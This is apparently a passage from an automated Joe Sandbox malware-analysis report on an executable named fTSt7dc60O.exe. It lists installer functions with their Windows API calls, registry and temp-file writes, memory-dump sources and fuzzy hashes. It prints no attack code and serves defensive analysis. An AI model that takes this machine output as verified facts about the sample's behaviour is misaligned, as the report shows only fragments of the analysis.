                                                          • SendMessageW.USER32(00000000,00000435,?,00000000), ref: 00404445
                                                          • SendMessageW.USER32(00000000,00000449,?,?), ref: 0040445A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ButtonCheckColorItemlstrlen
                                                          • String ID:
                                                          • API String ID: 1008850623-0
                                                          • Opcode ID: c6750d1af7fc37b23261af89bb4d058a0a528e63e4caaafb760cc352ffb3986b
                                                          • Instruction ID: 9ba40c4e88974133cb4bfc637ea25183e969009e68af47c920173fa3a1066339
                                                          • Opcode Fuzzy Hash: c6750d1af7fc37b23261af89bb4d058a0a528e63e4caaafb760cc352ffb3986b
                                                          • Instruction Fuzzy Hash: D7319CB1A00109BFDB01AF64DC85A6E3BA9FB44744F00447AFA05BA2A0D7399E529B59
                                                          Function 100022D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                          • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450882220.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1450819707.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1450905732.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1450962462.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                          • String ID: @H1v
                                                          • API String ID: 4216380887-3152185570
                                                          • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                          • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                          • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                          • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                          Function 004061DC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fTSt7dc60O.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403542), ref: 0040623F
                                                          • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                          • CharNextW.USER32(?,"C:\Users\user\Desktop\fTSt7dc60O.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403542), ref: 00406253
                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403542), ref: 00406266
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\fTSt7dc60O.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-1290787851
                                                          • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                          • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                          • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                          • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                          Function 004024EE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsk172E.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsk172E.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                          • String ID: 8$C:\Users\user\AppData\Local\Temp\nsk172E.tmp$C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll
                                                          • API String ID: 1453599865-1774745189
                                                          • Opcode ID: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                          • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                          • Opcode Fuzzy Hash: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                          • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                          Function 00404201 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                          • GetSysColor.USER32(00000000), ref: 0040423A
                                                          • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                          • SetBkMode.GDI32(?,?), ref: 00404252
                                                          • GetSysColor.USER32(?), ref: 00404265
                                                          • SetBkColor.GDI32(?,?), ref: 00404275
                                                          • DeleteObject.GDI32(?), ref: 0040428F
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                          Function 00402D1A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                          • GetTickCount.KERNEL32 ref: 00402D53
                                                          • wsprintfW.USER32 ref: 00402D81
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(0002C6C2,00000064,0003161B), ref: 00402D13
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                          • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                          • Opcode Fuzzy Hash: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                          • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                          Function 00404ABC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                          • GetMessagePos.USER32 ref: 00404ADF
                                                          • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                          Function 00401D41 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401D44
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                          • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID: Times New Roman
                                                          • API String ID: 3808545654-927190056
                                                          • Opcode ID: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
                                                          • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                          • Opcode Fuzzy Hash: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
                                                          • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                          Function 00402C7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                          • wsprintfW.USER32 ref: 00402CD1
                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                          • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                          • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                          • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                          Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          • GlobalFree.KERNEL32(?), ref: 10002572
                                                          • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450882220.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1450819707.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1450905732.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1450962462.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                          • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                          • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                          • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                          Function 004049D6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                          • wsprintfW.USER32 ref: 00404A70
                                                          • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$&B
                                                          • API String ID: 3540041739-2907463167
                                                          • Opcode ID: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
                                                          • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                          • Opcode Fuzzy Hash: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
                                                          • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                          Function 00402331 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk172E.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsk172E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk172E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsk172E.tmp
                                                          • API String ID: 1356686001-1340680331
                                                          • Opcode ID: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                          • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                          • Opcode Fuzzy Hash: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                          • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29
                                                          Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON
